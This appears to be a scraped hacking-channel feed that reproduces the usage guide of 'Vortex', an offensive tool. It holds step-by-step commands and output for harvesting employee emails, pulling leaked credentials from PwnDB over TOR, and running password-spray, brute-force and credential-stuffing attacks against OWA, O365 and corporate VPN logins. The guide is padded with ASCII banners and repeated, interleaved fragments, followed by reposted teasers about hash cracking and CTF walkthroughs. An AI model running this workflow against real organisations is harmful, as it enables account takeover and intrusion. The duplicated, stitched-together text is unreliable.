This kind of behaviour makes Vortex really easy to use. General Workflow Vortex has been designed to adhere to a specific operation workflow, summarized in the below schema:
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Operations Collect users Collect valid users for a specific target can be done using three different sources: LinkedIn This source has been removed for infringement of LinkedIn user policies. You can still operate on LinkedIn using GoMapEnum (https://github.com/nodauf/GoMapEnum), and then import the email addresses using the import command. Again, please be aware that using this functionality is a breach of the LinkedIn user agreement, as observable at point 8.2 (https://www.linkedin.com/legal/user-agreement#dos) of the LinkedIn user agreement: You agree that you will not: [...] 2. Develop, support or use software, devices, scripts, robots or any other means or processes (including crawlers, browser plugins and add-ons or any other technology) to scrape the Services or otherwise copy profiles and other data from the Services; CrossLinked To partially replace the above functionality, the tool embeds an adapted version of CrossLinked (https://github.com/m8r0wn/CrossLinked). This tool will try to detect employees of a company using Google and Bing. It's certainly not the same as directly searching on LinkedIn, but it's pretty useful. In order to operate correctly, the tool will ask the user which format should be used for usernames (i.e. john.doe, j.doe or d.john) and which is the standard domain used by the target domain. crosslinked -D evilcorp.com -C "Evil Corporation" ,d#####F^ ,yy############yy ^9#######, ,######" y###################by ^9######, ######^ y#####F"" ^"9######y "######] d#####^ ,#####" by klezVirus ^9#####, ^######, ,#####] ,####F yy#######y, ^9####b ^###### [##### ####F ,###F""'"9####, 9####] 9##### #####F [#### ,##F^ yy "###b 9####, ^#####] #####] [###] ### dF""#b ^###] ^####] #####] 9####b [#### 9##, 9bd [#] [##b ##### [##### [##### ####, 9##y, ,y##^ d##F ##### [####] #####b ^####y ^"#####" d###^ ,####] d##### [#####, ^####by ,d###^ d####^ #####F 9#####y "#####byyyyyyd####F^ d####F [#####9 9#####b, ""############"^ ,d####F ,###### ^######b, ""'""'"^ ,d#####F d#####F [+] Select a format for usernames 0: firstlast 1: lastfirst 2: first.last 3: last.first 4: last.f 5: flast 6: lfirst 7: f.last 8: l.first 9: first 10: last $> 2 [*] Starting search on Google and Bing with CrossLinked [>] Searching google for valid employee names at "Evil Corporation" [>] Searching bing for valid employee names at "Evil Corporation" [>] Found 133 LinkedIn accounts! [*] Updating DB ... [+] Done!">python manage.py -w workspace1 search -c crosslinked -D evilcorp.com -C "Evil Corporation"
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[+] Select a format for usernames
0: firstlast
1: lastfirst
2: first.last
3: last.first
4: last.f
5: flast
6: lfirst
7: f.last
8: l.first
9: first
10: last
$> 2
[*] Starting search on Google and Bing with CrossLinked
[>] Searching google for valid employee names at "Evil Corporation"
___________________________
@hacking_Attack
@Hacking_Video
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[+] Select a format for usernames
0: firstlast
1: lastfirst
2: first.last
3: last.first
4: last.f
5: flast
6: lfirst
7: f.last
8: l.first
9: first
10: last
$> 2
[*] Starting search on Google and Bing with CrossLinked
[>] Searching google for valid employee names at "Evil Corporation"
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - nodauf/GoMapEnum: User enumeration and password bruteforce on Azure, ADFS, OWA, O365, Teams and gather emails on Linkedin
User enumeration and password bruteforce on Azure, ADFS, OWA, O365, Teams and gather emails on Linkedin - nodauf/GoMapEnum
[>] Searching bing for valid employee names at "Evil Corporation"
[>] Found 133 LinkedIn accounts!
[*] Updating DB ...
[+] Done!
Google This source is operated using a stripped, modified version of theHarvester (https://github.com/klezVirus/vortex/blob/master). The tool will try to extract names/e-mails from Google (Passive Gathering) using Google Dorks, and from the company website (Active Gathering). ] Found 2 mail [*] Updating DB ... [+] Done!">python manage.py -w workspace1 search -c google -D evilcorp.com
[*] Starting passive/active search on Google
[*] (PASSIVE) Searching for emails NOT within the domain's site: evilcorp.com -site:evilcorp.com
[*] (ACTIVE) Searching for emails within the domain's sites: evilcorp.com
[+] Scraping any emails from: https://evilcorp.com
[+] Scraping any emails from: https://www.facebook.com/EvilCorp/
...
[+] 2 unique emails found:
---------------------------
elliot.alderson@evilcorp.com
tyrell.wellick@evilcorp.com
[>] Found 2 mail
[*] Updating DB ...
[+] Done!
PwnDB This source is operated using a ported version of the one implemented in sn0int (https://github.com/kpcyrd/sn0int). Note: this functionality requires to be connected to the TOR network. On Windows, it is possible to use the embedded version provided with Vortex. On Linux, instead, it is necessary to install the tor package (i.e. sudo apt-get install tor on Kali). Start TOR python manage.py -w workspace1 tor -c start
[*] Starting TOR Browser, click on connect
Enumerate on on PwnDB ] Found 493 leaked accounts! [*] Updating DB ... [+] Done!">python manage.py -w workspace1 search -c pwndb -D evilcorp.com
[*] Starting search on PwnDB
[>] Found 493 leaked accounts!
[*] Updating DB ...
[+] Done!
Stop TOR python manage.py -w workspace1 tor -c stop
[*] Stopping TOR browser
Collect endpoints Vortex uses mainly two macro-categories for endpoints: VPN and Microsoft (Office) endpoints. A target can be added both as an Office or VPN endpoint, and Vortex will try and validate the endpoint as an Office, or VPN endpoint, respectively, using a range of validators. Add an office endpoint Let's make it clear with an example. The user needs to attack the target evilcorp.com, and want to check whether the domain is an OWA, Lync, ADFS, or O365 target. python manage.py -w workspace1 office -c add -D evilcorp.com
[#] OWA domain appears to be hosted internally
[+] evilcorp.com is a valid OWA target!
[-] evilcorp.com does not seem a valid LYNK target
[-] evilcorp.com does not seem a valid ADFS target
[-] evilcorp.com does not seem a valid IMAP target
[+] evilcorp.com is a valid O365 target!
Search subdomains for VPN endpoints For VPN endpoints, the user can perform a subdomain search in order to find hosts running VPN Web Logins, like this: ] Found 10 subdomains [$] Elapsed time: 18.360117197036743 [*] Enumerating potential VPN endpoints (HTTPS on 443, 10443) [>] Found 1 hosts running an SSL webserver [$] Elapsed time: 18.916626691818237 [*] Trying to detect hosts with VPN web-login [>] Found 1 hosts with a VPN web login [$] Elapsed time: 32.919618368148804 [*] Updating DB... [+] Adding vpn.evilcorp.com:443 as a pulse target [>] Elapsed time: 18.920615434646606 [+] Done">python manage.py -w workspace1 domain -c enum -D evilcorp.com
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
___________________________
@hacking_Attack
@Hacking_Video
[>] Found 133 LinkedIn accounts!
[*] Updating DB ...
[+] Done!
Google This source is operated using a stripped, modified version of theHarvester (https://github.com/klezVirus/vortex/blob/master). The tool will try to extract names/e-mails from Google (Passive Gathering) using Google Dorks, and from the company website (Active Gathering). ] Found 2 mail [*] Updating DB ... [+] Done!">python manage.py -w workspace1 search -c google -D evilcorp.com
[*] Starting passive/active search on Google
[*] (PASSIVE) Searching for emails NOT within the domain's site: evilcorp.com -site:evilcorp.com
[*] (ACTIVE) Searching for emails within the domain's sites: evilcorp.com
[+] Scraping any emails from: https://evilcorp.com
[+] Scraping any emails from: https://www.facebook.com/EvilCorp/
...
[+] 2 unique emails found:
---------------------------
elliot.alderson@evilcorp.com
tyrell.wellick@evilcorp.com
[>] Found 2 mail
[*] Updating DB ...
[+] Done!
PwnDB This source is operated using a ported version of the one implemented in sn0int (https://github.com/kpcyrd/sn0int). Note: this functionality requires to be connected to the TOR network. On Windows, it is possible to use the embedded version provided with Vortex. On Linux, instead, it is necessary to install the tor package (i.e. sudo apt-get install tor on Kali). Start TOR python manage.py -w workspace1 tor -c start
[*] Starting TOR Browser, click on connect
Enumerate on on PwnDB ] Found 493 leaked accounts! [*] Updating DB ... [+] Done!">python manage.py -w workspace1 search -c pwndb -D evilcorp.com
[*] Starting search on PwnDB
[>] Found 493 leaked accounts!
[*] Updating DB ...
[+] Done!
Stop TOR python manage.py -w workspace1 tor -c stop
[*] Stopping TOR browser
Collect endpoints Vortex uses mainly two macro-categories for endpoints: VPN and Microsoft (Office) endpoints. A target can be added both as an Office or VPN endpoint, and Vortex will try and validate the endpoint as an Office, or VPN endpoint, respectively, using a range of validators. Add an office endpoint Let's make it clear with an example. The user needs to attack the target evilcorp.com, and want to check whether the domain is an OWA, Lync, ADFS, or O365 target. python manage.py -w workspace1 office -c add -D evilcorp.com
[#] OWA domain appears to be hosted internally
[+] evilcorp.com is a valid OWA target!
[-] evilcorp.com does not seem a valid LYNK target
[-] evilcorp.com does not seem a valid ADFS target
[-] evilcorp.com does not seem a valid IMAP target
[+] evilcorp.com is a valid O365 target!
Search subdomains for VPN endpoints For VPN endpoints, the user can perform a subdomain search in order to find hosts running VPN Web Logins, like this: ] Found 10 subdomains [$] Elapsed time: 18.360117197036743 [*] Enumerating potential VPN endpoints (HTTPS on 443, 10443) [>] Found 1 hosts running an SSL webserver [$] Elapsed time: 18.916626691818237 [*] Trying to detect hosts with VPN web-login [>] Found 1 hosts with a VPN web login [$] Elapsed time: 32.919618368148804 [*] Updating DB... [+] Adding vpn.evilcorp.com:443 as a pulse target [>] Elapsed time: 18.920615434646606 [+] Done">python manage.py -w workspace1 domain -c enum -D evilcorp.com
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
___________________________
@hacking_Attack
@Hacking_Video
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[ *] Starting subdomain passive enumeration
[>] Found 10 subdomains
[$] Elapsed time: 18.360117197036743
[*] Enumerating potential VPN endpoints (HTTPS on 443, 10443)
[>] Found 1 hosts running an SSL webserver
[$] Elapsed time: 18.916626691818237
[*] Trying to detect hosts with VPN web-login
[>] Found 1 hosts with a VPN web login
[$] Elapsed time: 32.919618368148804
[*] Updating DB...
[+] Adding vpn.evilcorp.com:443 as a pulse target
[>] Elapsed time: 18.920615434646606
[+] Done
Manually add a VPN endpoint To manually add VPN endpoints, of course, specifying the top level domain would probably not be enough. The correct way would be to specify a specific subdomain along with the specific port the VPN Web Server is running on. python manage.py -w workspace1 vpn -c add -D vpn.evilcorp.com:443
[+] vpn.evilcorp.com:443 is a pulse target!
Perform a password spray or bruteforce attack against OWA, ADFS, LYNC, or O365 To perform a password spray or even bruteforce attack, the only required resource is a password list in the form of a text file, with one password per line. 4 [*] Running O365Enumerator [-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid. [+] tyrell.wellick@evilcorp.com:Joanna2021! is valid! [>] Found 1 valid logins [*] Updating Db... [+] Done">python manage.py -w workspace1 office -c attack -P passwords.txt
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[*] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : owa
1 : lync
2 : imap
3 : adfs
4 : o365
5 : all
$> 4
[*] Running O365Enumerator
[-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid.
[+] tyrell.wellick@evilcorp.com:Joanna2021! is valid!
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
Perform a password spray or bruteforce attack against VPN endpoints To perform a password spray or even bruteforce attack, the only required resource is a password list in the form of a text file, with one password per line. 6 [*] Attacking vpn.evilcorp.com:443 [-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid. [+] tyrell.wellick@evilcorp.com:Joanna2021! is valid! [>] Found 1 valid logins [*] Updating Db... [+] Done">python manage.py -w workspace1 vpn -c attack -P passwords.txt
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
___________________________
@hacking_Attack
@Hacking_Video
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[ *] Starting subdomain passive enumeration
[>] Found 10 subdomains
[$] Elapsed time: 18.360117197036743
[*] Enumerating potential VPN endpoints (HTTPS on 443, 10443)
[>] Found 1 hosts running an SSL webserver
[$] Elapsed time: 18.916626691818237
[*] Trying to detect hosts with VPN web-login
[>] Found 1 hosts with a VPN web login
[$] Elapsed time: 32.919618368148804
[*] Updating DB...
[+] Adding vpn.evilcorp.com:443 as a pulse target
[>] Elapsed time: 18.920615434646606
[+] Done
Manually add a VPN endpoint To manually add VPN endpoints, of course, specifying the top level domain would probably not be enough. The correct way would be to specify a specific subdomain along with the specific port the VPN Web Server is running on. python manage.py -w workspace1 vpn -c add -D vpn.evilcorp.com:443
[+] vpn.evilcorp.com:443 is a pulse target!
Perform a password spray or bruteforce attack against OWA, ADFS, LYNC, or O365 To perform a password spray or even bruteforce attack, the only required resource is a password list in the form of a text file, with one password per line. 4 [*] Running O365Enumerator [-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid. [+] tyrell.wellick@evilcorp.com:Joanna2021! is valid! [>] Found 1 valid logins [*] Updating Db... [+] Done">python manage.py -w workspace1 office -c attack -P passwords.txt
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[*] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : owa
1 : lync
2 : imap
3 : adfs
4 : o365
5 : all
$> 4
[*] Running O365Enumerator
[-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid.
[+] tyrell.wellick@evilcorp.com:Joanna2021! is valid!
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
Perform a password spray or bruteforce attack against VPN endpoints To perform a password spray or even bruteforce attack, the only required resource is a password list in the form of a text file, with one password per line. 6 [*] Attacking vpn.evilcorp.com:443 [-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid. [+] tyrell.wellick@evilcorp.com:Joanna2021! is valid! [>] Found 1 valid logins [*] Updating Db... [+] Done">python manage.py -w workspace1 vpn -c attack -P passwords.txt
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
___________________________
@hacking_Attack
@Hacking_Video
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[ *] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
$> 6
[*] Attacking vpn.evilcorp.com:443
[-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid.
[+] tyrell.wellick@evilcorp.com:Joanna2021! is valid!
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
Perform a password spray or bruteforce using leaked credentials As Vortex keeps track of credentials (https://www.kitploit.com/search/label/Credentials) leaked on PwnDB, a user can select to test all leaked credentials instead of providing a password file. However, consider this behaviour is much different to a normal password spray. In a normal password spraying attack, indeed, a single password is tried against all users. In a leaked credentials attack, the leaked credentials is tested against the specific user it was leaked with. So, as an example, if Vortex found the leaks: User Leaks
---------------------------- ----------------------------
elliot.alderson@evilcorp.com ["ISecretlyLoveAngela2020!"]
tom.wellick@evilcorp.com ["Puppy19!", "MySweetJ111!"]
Vortex will operate the following attempts, and just the following: elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020!
tom.wellick@evilcorp.com:Puppy19!
tom.wellick@evilcorp.com:MySweetJ111!
To perform this attack, no password file is needed, but it's required to set the (-L, or --leaks) parameter. 6 [*] Attacking vpn.evilcorp.com:443 [+] elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020! is valid! [-] tyrell.wellick@evilcorp.com:Puppy19! is not valid. [-] tyrell.wellick@evilcorp.com:MySweetJ111! is not valid. [>] Found 1 valid logins [*] Updating Db... [+] Done">python manage.py -w workspace1 vpn -c attack -L
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[*] Choose an e ndpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
$> 6
[*] Attacking vpn.evilcorp.com:443
[+] elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020! is valid!
[-] tyrell.wellick@evilcorp.com:Puppy19! is not valid.
[-] tyrell.wellick@evilcorp.com:MySweetJ111! is not valid.
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
That's mostly it. Sometimes the tool can ask for more information before performing an attack, such as selecting the VPN realm/group. Showing results At any time, you can see valid logins you found using the following command: python manage.py db -w workspace1 -c found-logins
[+] Valid Logins Collected:
ID Target E-Mail Password
---- -------------------- ---------------------------- ------------------------
1 vpn.evilcorp.com:443 tom.wellick@evilcorp.com Joanna2021!
2 vpn.evilcorp.com:443 elliot.alderson@evilcorp.com ISecretlyLoveAngela2020!
[+] Done
___________________________
@hacking_Attack
@Hacking_Video
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[ *] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
$> 6
[*] Attacking vpn.evilcorp.com:443
[-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid.
[+] tyrell.wellick@evilcorp.com:Joanna2021! is valid!
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
Perform a password spray or bruteforce using leaked credentials As Vortex keeps track of credentials (https://www.kitploit.com/search/label/Credentials) leaked on PwnDB, a user can select to test all leaked credentials instead of providing a password file. However, consider this behaviour is much different to a normal password spray. In a normal password spraying attack, indeed, a single password is tried against all users. In a leaked credentials attack, the leaked credentials is tested against the specific user it was leaked with. So, as an example, if Vortex found the leaks: User Leaks
---------------------------- ----------------------------
elliot.alderson@evilcorp.com ["ISecretlyLoveAngela2020!"]
tom.wellick@evilcorp.com ["Puppy19!", "MySweetJ111!"]
Vortex will operate the following attempts, and just the following: elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020!
tom.wellick@evilcorp.com:Puppy19!
tom.wellick@evilcorp.com:MySweetJ111!
To perform this attack, no password file is needed, but it's required to set the (-L, or --leaks) parameter. 6 [*] Attacking vpn.evilcorp.com:443 [+] elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020! is valid! [-] tyrell.wellick@evilcorp.com:Puppy19! is not valid. [-] tyrell.wellick@evilcorp.com:MySweetJ111! is not valid. [>] Found 1 valid logins [*] Updating Db... [+] Done">python manage.py -w workspace1 vpn -c attack -L
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[*] Choose an e ndpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
$> 6
[*] Attacking vpn.evilcorp.com:443
[+] elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020! is valid!
[-] tyrell.wellick@evilcorp.com:Puppy19! is not valid.
[-] tyrell.wellick@evilcorp.com:MySweetJ111! is not valid.
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
That's mostly it. Sometimes the tool can ask for more information before performing an attack, such as selecting the VPN realm/group. Showing results At any time, you can see valid logins you found using the following command: python manage.py db -w workspace1 -c found-logins
[+] Valid Logins Collected:
ID Target E-Mail Password
---- -------------------- ---------------------------- ------------------------
1 vpn.evilcorp.com:443 tom.wellick@evilcorp.com Joanna2021!
2 vpn.evilcorp.com:443 elliot.alderson@evilcorp.com ISecretlyLoveAngela2020!
[+] Done
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
which should i get?
https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/
So.. im getting a laptop, and im gonna use it for bruteforcing and some gaming. So this are the options: Asus Rog strix g15 with -ryzen 9 5900hx -rtx 3060 115w -300hz -16gb ram (ampliable to 32gb dual channel) -rj45 Asus zephyrus g14 with: -ryzen 7 5800hs -rtx 3060 85w -120hz -16gb of ram (ampliable to 24 with 1 slot) -No rj45 So for brute force does the gpu W a deal? Does 16gb ram enough? Or should i upgrade it? If so, does single channel good enough? Is rj45 needed? Thank you in advance View Poll (https://www.reddit.com/poll/tjl48m) submitted by /u/Clyde253 (https://www.reddit.com/user/Clyde253)
[link] (https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/) [comments] (https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/
So.. im getting a laptop, and im gonna use it for bruteforcing and some gaming. So this are the options: Asus Rog strix g15 with -ryzen 9 5900hx -rtx 3060 115w -300hz -16gb ram (ampliable to 32gb dual channel) -rj45 Asus zephyrus g14 with: -ryzen 7 5800hs -rtx 3060 85w -120hz -16gb of ram (ampliable to 24 with 1 slot) -No rj45 So for brute force does the gpu W a deal? Does 16gb ram enough? Or should i upgrade it? If so, does single channel good enough? Is rj45 needed? Thank you in advance View Poll (https://www.reddit.com/poll/tjl48m) submitted by /u/Clyde253 (https://www.reddit.com/user/Clyde253)
[link] (https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/) [comments] (https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
which should i get?
So.. im getting a laptop, and im gonna use it for bruteforcing and some gaming. So this are the options: Asus Rog strix g15 with -ryzen 9...
Hacking on Medium
Intigriti -1337up CTF — Warmup Encoder writeup
1337UP was a 24 hours long CTF was organized by Intigriti . I personally solved a couple of challenges in the web and cryptography…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Intigriti -1337up CTF — Warmup Encoder writeup
1337UP was a 24 hours long CTF was organized by Intigriti . I personally solved a couple of challenges in the web and cryptography…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Intigriti -1337up CTF — Warmup Encoder writeup
1337UP was a 24 hours long CTF was organized by Intigriti . I personally solved a couple of challenges in the web and cryptography…
Hacking on Medium
Hashes — What They Are and How to Crack
https://cdn-images-1.medium.com/max/2600/1*euSMvlWzW3aKGIC9d1YMYA.jpeg
Hashes are used to verify the integrity of files and to store passwords as they are irreversible. But with a good wordlist and the right…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hashes — What They Are and How to Crack
https://cdn-images-1.medium.com/max/2600/1*euSMvlWzW3aKGIC9d1YMYA.jpeg
Hashes are used to verify the integrity of files and to store passwords as they are irreversible. But with a good wordlist and the right…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hashes — What They Are and How to Crack
Hashes are used to verify the integrity of files and to store passwords as they are irreversible. But with a good wordlist and the right…
Hacking on Medium
Matrix 3 VM Walkthrough
https://cdn-images-1.medium.com/max/768/0*9jvun0V5JdmdalUz
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Matrix 3 VM Walkthrough
https://cdn-images-1.medium.com/max/768/0*9jvun0V5JdmdalUz
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Matrix 3 VM Walkthrough
Makineyi indirebilirsiniz.
hacking: security in practice
Intercept API Calls of a PE
submitted by /u/r3drush
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Intercept API Calls of a PE
submitted by /u/r3drush
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Intercept API Calls of a PE
Posted in r/hacking by u/r3drush • 1 point and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How would I setup a hacking challenge?
I invented this tool (https://github.com/ki4jgt/Inertia), and have been told numerous times that it's insecure/a bad idea. But no one's been able to tell me exactly why. I've asked questions about it on Stackoverflow, and had programmers tell me that's it's not a great idea, and doesn't really secure passwords.
To me, it seems no different than having a password manager, with a master password on your desktop. Can someone tell me what's so bad about this? Or is it just a general feeling everyone has?
How would I challenge people to break it? I haven't changed my GitHub password to Goddard yet, but that's the challenge I have currently.
submitted by /u/ki4jgt
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How would I setup a hacking challenge?
I invented this tool (https://github.com/ki4jgt/Inertia), and have been told numerous times that it's insecure/a bad idea. But no one's been able to tell me exactly why. I've asked questions about it on Stackoverflow, and had programmers tell me that's it's not a great idea, and doesn't really secure passwords.
To me, it seems no different than having a password manager, with a master password on your desktop. Can someone tell me what's so bad about this? Or is it just a general feeling everyone has?
How would I challenge people to break it? I haven't changed my GitHub password to Goddard yet, but that's the challenge I have currently.
submitted by /u/ki4jgt
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How would I setup a hacking challenge?
